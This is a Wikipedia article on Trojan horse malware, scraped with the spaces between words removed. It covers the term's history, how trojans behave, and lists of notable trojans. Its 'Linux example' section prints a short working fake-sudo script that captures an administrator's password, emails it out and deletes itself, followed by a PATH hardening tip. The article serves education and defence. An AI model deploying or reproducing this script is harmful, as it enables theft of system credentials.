Trojan horse (computing) - Wikipedia

In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan ... Trojanhorse(computing) FromWikipedia,thefreeencyclopedia Jumptonavigation Jumptosearch Typeofmalware PartofaseriesonComputerhacking History Phreaking Cryptovirology Hackingofconsumerelectronics Listofhackers Hackercultureandethic Hackathon HackerManifesto Hackerspace Hacktivism Makerculture Typesofhackers Blackhat Greyhat Whitehat Conferences BlackHatBriefings ChaosCommunicationCongress DEFCON HackersonPlanetEarth SecurityBSides ShmooCon Summercon Computercrime Crimeware Listofcomputercriminals Scriptkiddie Hackingtools Exploit forensics-focusedoperatingsystems Payload Socialengineering Vulnerability Practicesites HackThisSite Zone-H Malware Rootkit Backdoor Trojanhorse Virus Worm Spyware Ransomware Logicbomb Botnet Keystrokelogging HIDS Webshell RCE Computersecurity Applicationsecurity Cloudcomputingsecurity Networksecurity Groups Anonymous ChaosComputerClub HomebrewComputerClub(defunct) LegionofDoom(defunct) LulzSec(defunct) MastersofDeception(defunct) Redteam/Blueteam Publications 2600:TheHackerQuarterly HackerNews NutsandVolts Phrack vte PartofaseriesonInformationsecurity Relatedsecuritycategories Computersecurity Automotivesecurity Cybercrime Cybersextrafficking Computerfraud Cybergeddon Cyberterrorism Cyberwarfare Electronicwarfare Informationwarfare Internetsecurity Mobilesecurity Networksecurity Copyprotection Digitalrightsmanagement Threats Adware Advancedpersistentthreat Arbitrarycodeexecution Backdoors Hardwarebackdoors Codeinjection Crimeware Cross-sitescripting Cryptojackingmalware Botnets Databreach Drive-bydownload Browserhelperobjects Computercrime Viruses Datascraping Denialofservice Eavesdropping Emailfraud Emailspoofing Exploits Keyloggers Logicbombs Timebombs Forkbombs Zipbombs Fraudulentdialers Malware Payload Phishing Polymorphicengine Privilegeescalation Ransomware Rootkits Bootkits Scareware Shellcode Spamming Socialengineering(security) Screenscraping Spyware Softwarebugs Trojanhorses HardwareTrojans Remoteaccesstrojans Vulnerability Webshells Wiper Worms SQLinjection Roguesecuritysoftware Zombie Defenses Applicationsecurity Securecoding Securebydefault Securebydesign Misusecase Computeraccesscontrol Authentication Multi-factorauthentication Authorization Computersecuritysoftware Antivirussoftware Security-focusedoperatingsystem Data-centricsecurity Codeobfuscation Datamasking Encryption Firewall Intrusiondetectionsystem Host-basedintrusiondetectionsystem(HIDS) Anomalydetection Securityinformationandeventmanagement(SIEM) Mobilesecuregateway Runtimeapplicationself-protection vte Incomputing,aTrojanhorseisanymalwarethatmisleadsusersofitstrueintent.ThetermisderivedfromtheAncientGreekstoryofthedeceptiveTrojanHorsethatledtothefallofthecityofTroy.[1][2][3][4][5] Trojansgenerallyspreadbysomeformofsocialengineering;forexample,whereauserisdupedintoexecutinganemailattachmentdisguisedtoappearnotsuspicious(e.g.,aroutineformtobefilledin),orbyclickingonsomefakeadvertisementonsocialmediaoranywhereelse.Althoughtheirpayloadcanbeanything,manymodernformsactasabackdoor,contactingacontrollerwhocanthenhaveunauthorizedaccesstotheaffectedcomputer.[6]Ransomwareattacksareoftencarriedoutusingatrojan. Unlikecomputerviruses,worms,androguesecuritysoftware,trojansgenerallydonotattempttoinjectthemselvesintootherfilesorotherwisepropagatethemselves.[7] Contents 1Useoftheterm 2Behavior 3Linuxexample 4Notableexamples 4.1Privateandgovernmental 4.2Publiclyavailable 4.3Detectedbysecurityresearchers 5Capitalization 6Seealso 7References 8Externallinks Useoftheterm It'snotclearwhereorwhentheconcept,andthistermforit,wasfirstused,butby1971thefirstUnixmanualassumeditsreadersknewboth:[8] Also,onemaynotchangetheownerofafilewiththeset—user—IDbiton,otherwiseonecouldcreateTrojanHorsesabletomisuseother’sfiles. AnotherearlyreferenceisinaUSAirForcereportin1974ontheanalysisofvulnerabilityintheMulticscomputersystems.[9] ItwasmadepopularbyKenThompsoninhis1983TuringAwardacceptancelecture"ReflectionsonTrustingTrust",[10]subtitled:TowhatextentshouldonetrustastatementthataprogramisfreeofTrojanhorses?Perhapsitismoreimportanttotrustthepeoplewhowrotethesoftware.HementionedthatheknewaboutthepossibleexistenceoftrojansfromareportonthesecurityofMultics.[11][12] Behavior Onceinstalled,trojansmayperformarangeofmaliciousactions.ManytendtocontactoneormoreCommandandControl(C2)serversacrosstheInternetandawaitinstruction.Sinceindividualtrojanstypicallyuseaspecificsetofportsforthiscommunication,itcanberelativelysimpletodetectthem.Moreover,othermalwarecouldpotentially"takeover"thetrojan,usingitasaproxyformaliciousaction.[13] InGerman-speakingcountries,spywareusedormadebythegovernmentissometimescalledgovware.GovwareistypicallyaTrojansoftwareusedtointerceptcommunicationsfromthetargetcomputer.SomecountrieslikeSwitzerlandandGermanyhavealegalframeworkgoverningtheuseofsuchsoftware.[14][15]ExamplesofgovwaretrojansincludetheSwissMiniPanzerandMegaPanzer[16]andtheGerman"statetrojan"nicknamedR2D2.[14]Germangovwareworksbyexploitingsecuritygapsunknowntothegeneralpublicandaccessingsmartphonedatabeforeitbecomesencryptedviaotherapplications.[17] Duetothepopularityofbotnetsamonghackersandtheavailabilityofadvertisingservicesthatpermitauthorstoviolatetheirusers'privacy,trojansarebecomingmorecommon.AccordingtoasurveyconductedbyBitDefenderfromJanuarytoJune2009,"trojan-typemalwareisontherise,accountingfor83%oftheglobalmalwaredetectedintheworld."Trojanshavearelationshipwithworms,astheyspreadwiththehelpgivenbywormsandtravelacrosstheinternetwiththem.[18]BitDefenderhasstatedthatapproximately15%ofcomputersaremembersofabotnet,usuallyrecruitedbyatrojaninfection.[19] Linuxexample ATrojanhorseisaprogramthatpurportstoperformsomeobviousfunction,yetuponexecutionitcompromisestheuser'ssecurity.[20]OneeasyprogramisanewversionoftheLinuxsudocommand.Thecommandisthencopiedtoapubliclywritabledirectorylike/tmp.Ifanadministratorhappenstobeinthatdirectoryandexecutessudo,thentheTrojanhorsemightbeexecuted.Hereisaworkingversion: : #sudo #---- #Turnoffthecharacterechotothescreen. stty-echo /bin/echo-n"Passwordfor`whoami`:" readx /bin/echo"" #Turnbackonthecharacterecho. sttyecho echo$x|mail-s"`whoami`password"[email protected] sleep1 echoSorry. rm$0 exit0 Topreventacommand-linebasedTrojanhorse,setthe.entryinthePATH=environmentvariabletobelocatedatthetailend.Forexample:PATH=/usr/local/bin:/usr/bin:.. Notableexamples Privateandgovernmental ANOM-FBI 0zapftis/r2d2StaatsTrojaner–DigiTask DarkComet–CIA/NSA FinFisher–LenchITsolutions/GammaInternational DaVinci/GalileoRCS–HackingTeam MagicLantern–FBI SUNBURST–SVR/CozyBear(suspected) TAOQUANTUM/FOXACID–NSA WARRIORPRIDE–GCHQ Publiclyavailable EGABTR–late1980s Netbus–1998(published)[21] Sub7byMobman–1999(published) BackOrifice–1998(published) Y3KRemoteAdministrationToolbyE&KTselentis–2000(published) Beast–2002(published) Bifrosttrojan–2004(published) DarkComet–2008-2012(published) Blackholeexploitkit–2012(published) Gh0stRAT–2009(published) MegaPanzerBundesTrojaner–2009(published)[22][23] MEMZbyLeurak–2016(published) Detectedbysecurityresearchers TwelveTricks–1990 Clickbot.A–2006(discovered) Zeus–2007(discovered) Flashbacktrojan–2011(discovered) ZeroAccess–2011(discovered) Koobface–2008(discovered) Vundo–2009(discovered) Meredrop–2010(discovered) Coreflood–2010(discovered) TinyBankerTrojan–2012(discovered) ShedunAndroidmalware–2015(discovered)[24][25][26][27][28][29] Capitalization Thecomputerterm"trojanhorse"isderivedfromthelegendaryTrojanHorseoftheancientcityofTroy.Forthisreason"Trojan"isoftencapitalized.However,whilestyleguidesanddictionariesdiffer,manysuggestalowercase"trojan"fornormaluse.[30][31] Seealso Computersecurity Cuckoo'segg(metaphor) Cyberspying Dancingpigs Exploit(computersecurity) Industrialespionage Principleofleastprivilege Privacy-invasivesoftware Remoteadministration Remoteadministrationsoftware Reverseconnection Roguesecuritysoftware Scammers Technicalsupportscam Timelineofcomputervirusesandworms Zombie(computerscience) References ^Landwehr,CarlE.;AlanR.Bull;JohnP.McDermott;WilliamS.Choi(1993).Ataxonomyofcomputerprogramsecurityflaws,withexamples.DTICDocument.CiteSeerX 10.1.1.35.997.RetrievedApril5,2012. ^"TrojanHorseDefinition".RetrievedApril5,2012. ^"Trojanhorse".Webopedia.RetrievedApril5,2012. ^"WhatisTrojanhorse?–DefinitionfromWhatis.com".RetrievedApril5,2012. ^"TrojanHorse:[coinedByMIT-hacker-turned-NSA-spookDanEdwards]N."RetrievedApril5,2012. ^"Differencebetweenviruses,worms,andtrojans".SymantecSecurityCenter.BroadcomInc.ArchivedfromtheoriginalonAugust19,2013.RetrievedMarch29,2020. ^"VIRUS-L/comp.virusFrequentlyAskedQuestions(FAQ)v2.00(QuestionB3:WhatisaTrojanHorse?)".October9,1995.ArchivedfromtheoriginalonAugust5,2020.RetrievedSeptember16,2019. ^Thompsom,K."UNIXPROGRAMMER'SMANUAL,November3,1971"(PDF).RetrievedMarch28,2020. ^Karger,P.A.;Schell,R.R.,"MulticsSecurityEvaluation:VulnerabilityAnalysis,ESD-TR-74-193"(PDF),HQElectronicSystemsDivision:HanscomAFB,MA,II ^KenThompson(1984)."ReflectiononTrustingTrust".Commun.ACM.27(8):761–763.doi:10.1145/358198.358210.. ^PaulA.Karger;RogerR.Schell(2002),"ThirtyYearsLater:LessonsfromtheMulticsSecurityEvaluation"(PDF),ACSAC:119–126 ^KargeretSchellwrotethatThompsonaddedthisreferenceinalaterversionofhisTuringconference:KenThompson(November1989),"OnTrustingTrust.",UnixReview,7(11):70–74 ^Crapanzano,Jamie(2003).DeconstructingSubSeven,theTrojanHorseofChoice(Report).SANSInstitute.RetrievedMay10,2021. ^abBasilCupa,TrojanHorseResurrected:OntheLegalityoftheUseofGovernmentSpyware(Govware),LISS2013,pp.419–428 ^"HäufiggestellteFragen(FrequentlyAskedQuestions)".FederalDepartmentofJusticeandPolice.ArchivedfromtheoriginalonMay6,2013. ^Dunn,John(August27,2009)."SwisscoderpublicisesgovernmentspyTrojan".TechWorld.ArchivedfromtheoriginalonJanuary26,2014.RetrievedJanuary10,2021. ^"Germanfederalpoliceusetrojanvirustoevadephoneencryption".DW.RetrievedApril14,2018. ^"BitDefenderMalwareandSpamSurveyfindsE-ThreatsAdaptingtoOnlineBehavioralTrends".BitDefender.ArchivedfromtheoriginalonAugust8,2009.RetrievedMarch27,2020. ^Datta,Ganesh(August7,2014)."WhatareTrojans?".SecurAid.ArchivedfromtheoriginalonAugust12,2014.RetrievedMarch27,2020. ^Wood,PatrickH.;Kochan,StephenG.(1985).UNIXSystemSecurity.HaydenBooks.p. 42.ISBN 0-8104-6267-2. ^Seth,Kulakow(1998)."IsitstillaTrojanhorseoranActualValidRemoteControlAdministrationTool?"(Report).SANSInstitute.RetrievedMay10,2021. ^"Mega-Panzer".SourceForge. ^"Mini-Panzer".SourceForge. ^"Trojanizedadwarefamilyabusesaccessibilityservicetoinstallwhateverappsitwants–LookoutBlog". ^Neal,Dave(November20,2015)."SheduntrojanadwareishittingtheAndroidAccessibilityService".TheInquirer.IncisiveBusinessMedia.ArchivedfromtheoriginalonNovember22,2015.RetrievedMarch27,2020.{{citeweb}}:CS1maint:unfitURL(link) ^"Lookoutdiscoversnewtrojanizedadware;20Kpopularappscaughtinthecrossfire–LookoutBlog". ^"Shuanet,ShiftyBugandShedunmalwarecouldauto-rootyourAndroid".November5,2015. ^Times,Tech(November9,2015)."NewFamilyofAndroidMalwareVirtuallyImpossibleToRemove:SayHelloToShedun,ShuanetAndShiftyBug". ^"Androidadwarecaninstallitselfevenwhenusersexplicitlyrejectit".November19,2015. ^"trojan".CollinsAdvancedDictionary.RetrievedMarch29,2020. ^"trojanhorse".MicrosoftStyleGuide.Microsoft.RetrievedMarch29,2020. Externallinks MediarelatedtoTrojanhorse(malware)atWikimediaCommons "CERTAdvisoryCA-1999-02TrojanHorses"(PDF).CarnegieMellonUniversitySoftwareEngineeringInstitute.ArchivedfromtheoriginalonOctober17,2000.RetrievedSeptember15,2019. vteMalwaretopicsInfectiousmalware Comparisonofcomputerviruses Computervirus Computerworm Listofcomputerworms Timelineofcomputervirusesandworms Concealment Backdoor Clickjacking Man-in-the-browser Man-in-the-middle Rootkit Trojanhorse Zombiecomputer Malwareforprofit Adware Botnet Crimeware Fleeceware Formgrabbing Fraudulentdialer Malbot Keystrokelogging Privacy-invasivesoftware Ransomware Roguesecuritysoftware Scareware Spyware Webthreats Byoperatingsystem Androidmalware ClassicMacOSviruses iOSmalware Linuxmalware MacOSmalware Macrovirus Mobilemalware PalmOSviruses HyperCardviruses Protection Anti-keylogger Antivirussoftware Browsersecurity Datalosspreventionsoftware Defensivecomputing Firewall Internetsecurity Intrusiondetectionsystem Mobilesecurity Networksecurity Countermeasures Computerandnetworksurveillance Honeypot Operation:BotRoast Authoritycontrol:Nationallibraries Germany Retrievedfrom"https://en.wikipedia.org/w/index.php?title=Trojan_horse_(computing)&oldid=1074020901" Categories:TrojanhorsesSocialengineering(computersecurity)SpywareWebsecurityexploitsCyberwarfareSecuritybreachesHiddencategories:CS1maint:unfitURLArticleswithshortdescriptionShortdescriptionmatchesWikidataWikipediasemi-protectedpagesUsemdydatesfromMay2018CommonscategorylinkisonWikidataArticleswithGNDidentifiers Navigationmenu Personaltools NotloggedinTalkContributionsCreateaccountLogin Namespaces ArticleTalk English Views ReadViewsourceViewhistory More Search Navigation MainpageContentsCurrenteventsRandomarticleAboutWikipediaContactusDonate Contribute HelpLearntoeditCommunityportalRecentchangesUploadfile Tools WhatlinkshereRelatedchangesUploadfileSpecialpagesPermanentlinkPageinformationCitethispageWikidataitem Print/export DownloadasPDFPrintableversion Inotherprojects WikimediaCommons Languages AfrikaansالعربيةAzərbaycancaBân-lâm-gúБългарскиBoarischBosanskiCatalàČeštinaDanskDeutschEestiΕλληνικάEspañolEsperantoEuskaraفارسیFrançaisGalegoગુજરાતી한국어हिन्दीHrvatskiBahasaIndonesiaItalianoעבריתJawaქართულიLatinaLatviešuLietuviųLombardMagyarമലയാളംBahasaMelayuМонголမြန်မာဘာသာNederlands日本語NorskbokmålNorsknynorskਪੰਜਾਬੀPolskiPortuguêsRomânăРусскийShqipSimpleEnglishSlovenčinaSlovenščinaСрпски/srpskiSrpskohrvatski/српскохрватскиSuomiSvenskaTagalogไทยTürkçeУкраїнськаTiếngViệt吴语粵語中文 Editlinks